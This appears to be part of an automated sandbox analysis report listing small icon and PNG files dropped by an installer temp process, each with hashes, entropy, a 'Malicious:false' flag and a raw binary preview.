                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.mSkHSa.~..9..Q.$.NQ1.2... Z.)+.H.4..K.R.......`..y..BfXV:..vQ,.()4..l.R......:.cf..9..{..y..y..|....B....E"Q.{a4....wuu.0G.g1...T*.WUU....f..Az..\.Z........u.'.QQQq....A ...q.0`.......A.W$.;.?R...fP.T..~...`........ ..M..x8kG.?.......' ',.c......dF.g..{zzZ#.H.[r'.P.XG....L......AGq+J.n.i.%444.`.....1nq.......+...\.....MS.@........|.><.....DOOO^bbb.+......u...0..../..>....&~..@......G......-].]h`.^vl.,d.....p...1(.O.M?........M.`ll......).X\..^'._!|...\.....x...?.........GGG....yIIIu..X....X$.....@.....%8..F.,.).....:7...q.m...-..).-..v.Ap*...\.mx.M......7.P(..5.t.zf.......R......i.....^~.n....5222.3..T[[....=[./`..0=....6~..?,.<I&X......X.n+...%...hX+..V..>...2C.c.4..(...s.Z.....s[y..Q"-))).........'L..3....i[.e2YHVVV.g.....i...q....N...W....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.304963365030796
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:cKwiwjHRFNgmsPn71386ICxQo0hkNNNNN9:cMwjxFpi386Yo0ib
                                                                                                                                                                                                                                                          MD5:19A1D5E299A9AEEF8E449AE555935968
                                                                                                                                                                                                                                                          SHA1:E7C1EA89DE88FEE6B616ABBE5365C5AA3E42F672
                                                                                                                                                                                                                                                          SHA-256:27CC231887F86DDB6FF938C1FBBC2CE319057BF90382B764AF86ED3F9C47CCB8
                                                                                                                                                                                                                                                          SHA-512:973CCD95A012657F00B195AF3558E5E67B2AD194F9261EC3E8FD9FFC4F423E10A730E4D0ABFC4243F91FAD35097BE09D1DD0D1646CFCF1821F1928E23015CB8E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ............................................................*...u...................U...................................@'''.....................[[[....U...........................5kkk.............................OOO.........................))).................J4..:)..@@@................................*........qqq.SV..w.,...+.....oN...............................*..............|./...<...@.mL...........................@...j....bbb.0!........N........s0.....aaa%...........U....[[[.........KKK..m...B.....u.....aaa%............zzz......................................_...............U................GGG.....\\\.PPP.............................OOO.........@@@.6C..h...}...>...........................................J4....+.{.....,.............................................HHH.l...-...I...~..D.................................333.........lL.............f.KKK0............................... ggg..........t......T.aaaJ..........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):675
                                                                                                                                                                                                                                                          Entropy (8bit):7.483904311870301
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7doMHmeia+juikJeSnm7XW6rJ5XUkABLVsHAVSjneDkMC1:Ao9La+juxnm55uLPs1
                                                                                                                                                                                                                                                          MD5:BD04877B6C91557B84463719664B0292
                                                                                                                                                                                                                                                          SHA1:6B5783097D914F8A463363843B8D24C6C933DDFE
                                                                                                                                                                                                                                                          SHA-256:B2FE786345D8E1802BAA576C0E359240EA2811BCAB1BADB433743792BB9FAA77
                                                                                                                                                                                                                                                          SHA-512:715C6079A00306A46E221C432336B1A4AD23DA6D8AB6BDE7D9F992DF162AAA04D9332D3BAF84DBD6CBA0D4160DE4DE773F266F556CBBEAA015A5D54DC078D33E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...jIDATx.cd... 6.bQ(.+....o...#.+....gee..|...o...R.l;....{qg.....5...k.......Qy.)....r..8...4.c..=.Wo.u...8...........tb.J....s..^..S~..c...\..XPQQ.H......>..b......._V.+g..:.N]...........O....._`X.>.........o..&.".^....5..C.M........8y...3f..s..../_...a..>.@Q.PUU....-...6,.>...(.AJJj!..0.*,,....!...+ &&&.......xT.S...Z:HC...O.>../,X. .....l.%(...........m..F.W..N.*...:..SV>X...:q.DGF..@k.].XYYy..Cf..7.J(...e.``...p`.........~...../.....t..O.}P.W.....q....}...;*h.....e.....*...A..v.......L....~.. .&0s...{...i...fggO-,,.......={..$......333..3......Kkjj.@...~..kWW..K.N d.8<....;0...[.x5..\.'.i......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.984582163595734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ltjzPCZMaBUC2R0pwXqeCvJX/JutpSu39Gl/GofW9y88rk:ltj05gBXqeCJ/8pSx/Gp9y88w
                                                                                                                                                                                                                                                          MD5:4EAA9A0B583BB8C8A369753DBD0DD0EB
                                                                                                                                                                                                                                                          SHA1:2D8F80DF55ADB806651E9B90C32C287825EFA9B6
                                                                                                                                                                                                                                                          SHA-256:EABEFD31E31D5141F75E760FCF96F14844F0824BD20C3FAD28C6E7C6AF4342FB
                                                                                                                                                                                                                                                          SHA-512:B4B5CE8697B0B195F5DFF361B7822207CBC8BB07A3318154A4652A663F9715958770B55ED9D8B0F5EE37AC5BCDD19C4D2389E7D644187B86762565ED27613D8D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................................................................................................................t4..z9..z9..z9..t5.....................!.9.&.=.!.9.!.9..v4..q3..z9..H..E...D..z9..q3..q3........OG.X.=.O.-.C.`.v.`.v..x8..W..z9...M.f...5...+...%...+.../...?...I.[.\.s.8.O.[.o.[.o...D.....G...J...X...a...X...O...K...V...U...=...`.t.?.d.S...J...S...a...o...a...J...E.....y..d...B.....J...O...Q...Z...f...s...i...W...N........j............K...../...J...X...[...X...L...b....z.................z..Pi........R.eHc.w.m..s...........V....................U..U.............R.eoQ.d.O.b.M.`.L.^.g.Zl.W..W..W..W..W..W.....................:.JW9.J.9.I.9.I`.....q3$.z<.r3..{=.t5$........................:.K.......9.I......{=..|......X..|>.........................;.K......:.J......s4.........|..v6.........................;.LE;.L.:.K.:.KN......@........t...A..............................................~?!..E..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):763
                                                                                                                                                                                                                                                          Entropy (8bit):7.6950381846314215
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/71dxGeeaA/as1IpxNhX3HqPPwVS2TgW41SeJq5RXB4f4a:oqeeaAT1IpxNhKXNW5VBO4a
                                                                                                                                                                                                                                                          MD5:F38AF891CBBDCD155644E65363A01520
                                                                                                                                                                                                                                                          SHA1:BA161945A3E87EA2B3735165854E8AEF28B4F201
                                                                                                                                                                                                                                                          SHA-256:DEF30878F80E5B00CE9F334170DD6369127C52E03959F5673B7193D8B21EE80D
                                                                                                                                                                                                                                                          SHA-512:AFB7BD4EECEF8B2E9E082E3A7203DC393E92683B4AD2B301072A4BC8C22D710AF740BC553EE92997C714FD80F993A3BE0257EC09FF46C75AEEC3EB615553613C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..iHTQ...o..of..mT,M.@..Q).R"A.......Yb~0+..,../.}.>....X...J..DV..6.3..t.w{c$A.A....=.w.{....j'.....4-.K$T...W.w$...3m.H........ZT._.t6$..4.....\Z.....#.Z.....V.Og.....Z.oxm._..F..:.;,..0..1.Y.i..^....;qs..}..F..m.6]...*..JH..W.1.......D.....Rn..!O..T,%..z.........{(........,._.....&....#...........9">..#N..?....l.D.dO..&.....4....0..V}$b"u...ly..0....].F....S........b.....U......P.....@&.B....0.A.\~}A....I!..Eg..0.Z...M^........O.2.Z_.4.Jpv..6C...D.td.....94Db..E..7..,.J...J-..2..,..8T....p.#C.k..SU.y..g[..~a^.q.=.C6k....w.IT+4../...eY..p.P*..En.....rY..*. *"j.... .^..l......:.p}PS6P.....*...o...fdD..8.S.&..(Z...A...uqD...f.Y.i2.{?s...}.fMNK..u.].z*3.....'....K.R....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.275771912287761
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:INtkHVr7SidRa/Obkfbw8H1y3LIseAevOGZ0bTsB:LVPS0a2AfjeIEeBZ0bTsB
                                                                                                                                                                                                                                                          MD5:6A4FEA20675B423DC5B6AFC565BA2D57
                                                                                                                                                                                                                                                          SHA1:D241A8C16A86789F1B28EAA58B164AE6C9457FC1
                                                                                                                                                                                                                                                          SHA-256:73EC225A303B4A44537CBBCFEB5FC07BB8EEB9FDFE0FACA788309CC7C75F3F74
                                                                                                                                                                                                                                                          SHA-512:2948886496B704F85A71549341A1D8E5DE36375CCC6FF79B0F95BB6FC755147DE35C6F556E02CFF916B5967F95891E1586F065DC329A68E057093032B485A4A0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................................K.}.s......(...)........w...H.....!... .................W.#.n..&...<...M...i...k...[...C...+....q...K./.............W.#.u..*...A...>...'...*...5~..&...;...G...2....x...V.,.........l.."...>...'...!T..-(..BA..MN..>=..)4..%...D...+....r.......[.j..../...5....J.."...("..63..=;..40..' ..!)../...8........p..p..$...8...+~....f.....$...)"..,&..(!..$........K..:...*....v...}......>... F....4...d.......................\..+`.9...3........~..3...C...Ni......................................7...8........~..2...E...?d..z...............................f...9...9........}..0...L...Y...]...]...`...c...c...`...\...]...Y...N...8........r..1...U...\..._...v....xs.....}..........._...^...W...8....y...b.u....R...W...f........LA..........LA.....g...Z...V... ....w......r..*...^...m...........................p...a.../....z..'........W.#.w..-...x...........................|...1....z.....M.............W.#.s..&...k...................o.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):921
                                                                                                                                                                                                                                                          Entropy (8bit):7.692568178991757
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7MIPvdQrswMHeAQQI/hnoG82ukRW61fAKmg0sLyVFIMVwIaJ2OnksgHDPkInc:MersR+SIZbnu+FXaYyVBtM2Oksgjlzv4
                                                                                                                                                                                                                                                          MD5:A319CAB2BDD2363F2CE6F71874255367
                                                                                                                                                                                                                                                          SHA1:606F86B9B032C74B9A88240A9A4933B4EA256C52
                                                                                                                                                                                                                                                          SHA-256:0644CF298FE403904496AF78ADDCCDB46C1D3A324BC996A1423F9CC581EBFA39
                                                                                                                                                                                                                                                          SHA-512:D74BB956EF9011436A44617B8DB7519F8335A10F55805BEC4CDB673F971E148614B9A4068146D182BB6024B5774C85CB35A4B10BEC5307F2C367179DEB45E07E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...`IDATx.].Mh.e..w.....Mf..k...BK..B+I..A.%.*..z(V.*.b.S...E.=..J...DR.R.P#..d..I..Iv...$......uczp..wx....K.o....;...8$*.;Ax...).J..X..;.;...Ru/....<.J.b...`X9x.B.m@I..a-~...Q..p..V...[.....}.h_T.z.........m...6.b......-;..................#pD/........n9.g.....s...F9}..?..</......P..+o.Q.I`f/.^Ma./..\#..N.!..(c....R.S....=.....xX....L.S......}...X._~..8u\....&....p.......w.J..g............1..M...d...x6.......~..yr......[q.......^...@9.efr...:.J....8.O!...X...Y.}.........U."..sbYTm....6.O.5.....[.-.YBK_....W./..x....NVJ..g..e.c..a...../$..&.. sC.t./....].w.na.....4^..S.-..f..Mp....../......;.G.~.+...#..,..<....c.i.*..E,K&..4D{$.fVaL.\n.....l.WO....,.wL..W$...*l.. ..!....c...T.?_e.]...Fd.....h.d..&...m.].4t.u#...^0..y.J....e...Rn..... ...*1....U......Av|}s|...{#....1..T&......V]J.a..<f..|..~.b...?U/...e.g..<wM.5.}.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.636162501782274
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:L9Ma1/Da+8+n63MJPD7wVGuTsJsr1sZbol4zQvH:ZN17a+8+jlmsJsxll
                                                                                                                                                                                                                                                          MD5:0673E359F24B2E3E70DEF71FD99DCA08
                                                                                                                                                                                                                                                          SHA1:9CCFDF61774455EFA4F203A295B7CD73970381F1
                                                                                                                                                                                                                                                          SHA-256:9B2E88181222D914DF957836D7DDD48F1400CEF417C2AAF4705F399F07E4F872
                                                                                                                                                                                                                                                          SHA-512:C6178BDBCCCE71F4F92FEF31E8D5FADA4098CD5A2CF9A9593EE5A9E81CC9B878820731EE32874EF912FE816050B7A7F3DC280A2381B2BF41DEC8332BDBC98F9C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................................................................................................................................................................................................................................................[I.....F#...L<P................................................................................................^L..........\H..hQ.......t.................................................................................................nF9..........]I..oV..hQ.......w.........................j?6E.YKs.YJu.YJu.XJu.XJu.WIu.XIu.UGu.REu.SEu.REu.SDu.SDu.SDu.RCt.RBy.VF\.........aM..qY..oV..iR.......x......................iX..}h..j...j...j...i..~i..~h..}g..wd..vc..vb..vb..wb..wa..wa..w`..v_..v`......fQ..t[..qY..pX..jT.......z..........}......fV_.m..m..l..l..l..k..k...j..we..vd..vd..wd..wc..wb..wb..wb..wa..xb..\Ms.gS..v^..r[..rZ..qY..kU.......|.................{h..o..n..n..n..m..m..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.066773618954921
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Ph9MjBRXLI4PPPPPPP5PPPlPPPPPvsuzWNQ:PhIl6u
                                                                                                                                                                                                                                                          MD5:2F777CE0EAAF668E63BACB213F805C72
                                                                                                                                                                                                                                                          SHA1:1200A1ACD3E1E8909738870ECA24FD3DB5E4EF4E
                                                                                                                                                                                                                                                          SHA-256:F29CE4EA22FB3C298B8B98E2600D85F76C00C81502332BDC21B6B6D4BFFFA8D1
                                                                                                                                                                                                                                                          SHA-512:5A9E8A41FC543E5AC83C1020CF503C5239D68A68228E18441FD58C560E3D19661F8B54702483984DF378B500DA09D144CD250ABB2A29742066B46E3FC9BC6F68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................................m.*.k...k...l.a.m...............................................................................................................m.u.m...m...m...m...l...m.u.m...l...m...m...m...m...m...n...m.p.q.".............................................................p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...q.?.....................................................q...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...q...o.'.............................................t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...s.P.....................................u.z.v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v.w.............................y.i.y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...x.f.....................{.6.{...{...{...{...{...{...{...{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.327550606417895
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:7ok26VKvsyK8gww8d6IrU866xoQ6iekgM7F5F616mlunzNa:7hNqsyw8NxogekgS/01l2zQ
                                                                                                                                                                                                                                                          MD5:B1B0BDF79925656C6612EB420EFDD0CB
                                                                                                                                                                                                                                                          SHA1:67A7A212310C229BD3753F937FE769392719BA85
                                                                                                                                                                                                                                                          SHA-256:02FDCF85764302068222786937E5769650543F7B19B06208B65CE325792E7282
                                                                                                                                                                                                                                                          SHA-512:700EDB186443417B8B5C2FFF44AC0CA4F40492F08789A4C44818F8255E4C5082AB7388AFBEE9DBE86C3979D15FF92F6CF33ED787694470AF7B88B86BD180F01D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ........................................................................................................................................................................................................................................................................................................................................!...!........................................................................................................141.........! !.!$!Z...1...1...)...!............................................................................................RQR9....101.Z]Z.........)()s...J...9...)...!........................................................................................BEBZ............sqs.....! !....Z...J...9...).......................................................................................)141.),).............),)........s...R...B...1...!...........................................................................!...1...J..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):2.904108079904619
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:F+E7L9sciO2jASO/R9Zo6bVUZ0SS/UHL4/h3A4+Brwc2Ni:F+qcjZE7ZL6ZTS/Ur+398rwHw
                                                                                                                                                                                                                                                          MD5:B4C726712268AACA5C8044B19D242C56
                                                                                                                                                                                                                                                          SHA1:82295BE76E35F3B7A017C71DF4AFB7BCB13B8BD9
                                                                                                                                                                                                                                                          SHA-256:67360906D5C412946E6621E6952DCC72E260B4BDA6B1097FB89D0968746B557A
                                                                                                                                                                                                                                                          SHA-512:255E561C23605247FCA1BB3F071CE4E87DA9F580C93F9CB87980F2680C106FEF6B91E478953C667E55AC0B9C4891FB0D6389671AD5C1AEF0DD820ABC032A7F62
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ...... .............................(...........................................................................................................*...............M...................................................................................................................U.......$...........................................................................................................................-............................................................................................................................................................................................v.v.1.1........................................................................................................................................................................................................................................................................J.J...........................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.015933025401917
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:jlLTFwirlRR25mD7NHgf/nrqQ6kcwpgHBWgOXKpAsDn5DnO9eXVP:ZLTFwirlRRymnN0/rqpkcwaDOXZsxqYZ
                                                                                                                                                                                                                                                          MD5:B5DECCE572BF993C4F6CD6BD108DF2C3
                                                                                                                                                                                                                                                          SHA1:21C33E841AF7DE3AF8868EAFF54EDB1492AEBEA4
                                                                                                                                                                                                                                                          SHA-256:42A521BC3EF75526B3A1839DA875A949B369C6A00F2EAA43C8BECBB3E8279555
                                                                                                                                                                                                                                                          SHA-512:EEE0D7F592836DFCEB0D50E2695DF6ACF336211E3C83C9DF8B49325BD03E2B3E5BD39DC8CAE3193A32D953CAA79543F8D356930CC6C6769A861EDA8F31E04D6A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .................................................................................................................................................................F.>.C.;.C.<.C.<.C.;.B.<wC.=.............U.@.B.<UD.<|C.<.C.<.B.<.D.=.C.<nG.@$....................................................U.U.B.=.B.;.B.;.B.;.B.;.B.;.B.<.B.=hB.<.C.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.<.D.=mf.f.................................................C.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.B.;.C.<.C.=P................................................B.;.B.;.B.;.B.;.B.;.B.;.B.;.T.N..........................O.H.B.;.B.;.B.;.B.;.C.;.............................................C.?AB.;.B.;.B.;.B.;.[.U........................................B.;.B.;.B.;.B.;.B.;.C.;.........................................C.;EB.;.B.;.B.;..............................................B.;.B.;.B.;.B.;.B.;.B.;.C.;.................................F.F.C.;.B.;.B.;..........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.066773618954921
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Ph9MjBRXLI4PPPPPPP5PPPlPPPPPvsuzWNQ:PhIl6u
                                                                                                                                                                                                                                                          MD5:2F777CE0EAAF668E63BACB213F805C72
                                                                                                                                                                                                                                                          SHA1:1200A1ACD3E1E8909738870ECA24FD3DB5E4EF4E
                                                                                                                                                                                                                                                          SHA-256:F29CE4EA22FB3C298B8B98E2600D85F76C00C81502332BDC21B6B6D4BFFFA8D1
                                                                                                                                                                                                                                                          SHA-512:5A9E8A41FC543E5AC83C1020CF503C5239D68A68228E18441FD58C560E3D19661F8B54702483984DF378B500DA09D144CD250ABB2A29742066B46E3FC9BC6F68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................................m.*.k...k...l.a.m...............................................................................................................m.u.m...m...m...m...l...m.u.m...l...m...m...m...m...m...n...m.p.q.".............................................................p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...q.?.....................................................q...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...q...o.'.............................................t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...s.P.....................................u.z.v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v.w.............................y.i.y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...x.f.....................{.6.{...{...{...{...{...{...{...{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.386046922758486
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:su7IUPPPPRZZZZZ+avnjxUrbbbbbbbbLB2JeFxgeaXQ0:hIUPPPPaavlUrbbbbbbbbLBoOxsXJ
                                                                                                                                                                                                                                                          MD5:5D316BF8CE58BBA7DE8943D5E8A60244
                                                                                                                                                                                                                                                          SHA1:898FCA22C2A5FDC22859FB4994BDC8105D797BC2
                                                                                                                                                                                                                                                          SHA-256:92B5DF95A623E9786D079E86264CDCF882EF6C80FA824564D584B530D50BF483
                                                                                                                                                                                                                                                          SHA-512:F7C9E47127411FAE362A2BEC2A196C4C6116350D3AF7D8E6841D7824D5F0148EA8CAEF04BC5F404BD055229EB209DED86578E3EA594EB1CCCE5219586225C904
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................................................................................................................................................................................................{`.{..{..{..{..{..{..{`.........................................................................................{ .{..{..{..{..{..{..{..{..{..{..{ .............................................................................{ .{..{..{..{..{..{..{..{..{..{..{..{..{ .........................................................................{..{..{..{..{..{..{..{..{..{..{..{..{..{......................................................................ib`.ib..ib..ib..ib..ib..ib..ng..{..{..{..{..{..{..{..{`.................................................................^X..^X..^X..^X..^X..^X..^X..^X..xp..{..{..{..{..{..{..{r..YP..YP..YP..YP..YP.............................................l<8.l<
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.865260776041573
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:KSAuCHoaNkcD71rTr/JXTL2oOJu2u/V8o52K:KJuCHHN/rTMoOJun/VJUK
                                                                                                                                                                                                                                                          MD5:340BD449C16ECBF1A7BC30C7B3AED555
                                                                                                                                                                                                                                                          SHA1:D4464A700F4A7C6CDA68BE19AE90B0526D980B33
                                                                                                                                                                                                                                                          SHA-256:01F8E1E82FDA69928E9EDA19DE2D775F4194CB8ADC081753C426456BFE2619F6
                                                                                                                                                                                                                                                          SHA-512:16807B0C2B16547397D717DDA738B69122F2C3DC6CF2DE988F8675D4F2E0B5C9592D350FF6F408F012FCB4B3822FDB5ED6CA887D311DDAED090193AFAF0826B1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ............................................................................................3...@...-...*...@...&.......................................................................................................(+...[(..m7..D...G...a1..>......<.......................................................................................'...7...D...E3...L ..V7.f)..X....>".s5.. ..z...................................................................)...0...9...A...I...O...R...S...P*..zB...n8&.c(..P...{9!.t1..4...................................................... ...E'......\...D...P...V...Y...Z...[...`...g...i!...E...v:+.T...L...p/".^...8...A..4........................................)..tI..........=...@...P...T...Y...c...j....&&0.<>J.div.....j<5.j(..C...M...Y...E...A...}..=................................=...Q...8......g...Q.......c...V...v((1.?@L.hny...............n\b.a"..O...;...H...t5..c+..L...z..$........................J..|R...4...0.......).....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.760005259103538
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:9cPueb/98+LRtKVF/7x5qcUuD4oxp7SJU9Jhni4GZ9h2u0Kuq+j6vQuQ:efO8Yx42Jhni4GUuLuhmY/
                                                                                                                                                                                                                                                          MD5:6EDC10A9110ACA8413A654526A2C9A08
                                                                                                                                                                                                                                                          SHA1:74515C9BAEE2A5CA04CBF57A179F98FFA650B890
                                                                                                                                                                                                                                                          SHA-256:E15B8D976729695D510F6CD60E047006F57D09DCF477A58F7D3CF09ED9A34AAA
                                                                                                                                                                                                                                                          SHA-512:1E02B7F6028872398FA087B6BCA84E7F5B5D85BBB14BE1F05F576AAC4E531127A2B5919095C8479838F98CDCCBBE8274891A355857515F94061FF2B8D4D286B1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
